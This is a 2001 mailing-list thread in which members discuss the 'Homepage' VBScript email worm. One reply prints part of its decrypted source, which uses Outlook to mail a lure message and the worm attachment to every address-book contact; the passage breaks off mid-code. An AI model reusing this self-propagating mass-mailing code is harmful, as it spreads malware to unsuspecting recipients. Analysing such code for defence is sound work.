nanogui: (OT)vbs-virus/worm RE: Homepage

Subject: (OT)vbs-virus/worm RE: Homepage
From: Bjorn Eriksson ####@####.####
Date: 9 May 2001 11:09:01 -0000

On Wed, 9 May 2001, Alex Holden wrote:

> On Wed, 9 May 2001, Sadeesh Kumar wrote:
> > What is this Homepage? It is showing stupid photos?.
> > Please don't send this kind of things in mailing lists.
>
> Actually it was a virus. ####@####.#### probably didn't send it
> intentionally.
>
> On Tue, 8 May 2001, Alex Pavloff wrote:
> > Lets hope that all our Outlook users were using the proper protection.
>
> Or at least that they had enough sense not to run an unknown program that
> they received in an email from somebody they don't know.

 Actually,

 1) It was a worm and,
 2) Idit Neuman probably got the vbs-worm from someone she /knew/...

 The worm doesn't contain any malicious code, just a simple replicator.
Decrypted:

Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
        Set Mapi=Outlook.GetNameSpace("MAPI")
        Set Lists=Mapi.AddressLists
        For Each ListIndex In Lists
                If ListIndex.AddressEntries.Count <> 0 Then
                        ContactCount = ListIndex.AddressEntries.Count
                        For Count= 1 To ContactCount
                                Set Mail = Outlook.CreateItem(0)
                                Set Contact =
ListIndex.AddressEntries(Count)
                                Mail.To = Contact.Address
                                Mail.Subject = "Homepage"
                                Mail.Body =
vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's
 really cool ;O)"&vbcrlf&vbcrlf
                                Set Attachment=Mail.Attachments
                                Attachment.Add Folder &
"\homepage.HTML.vbs"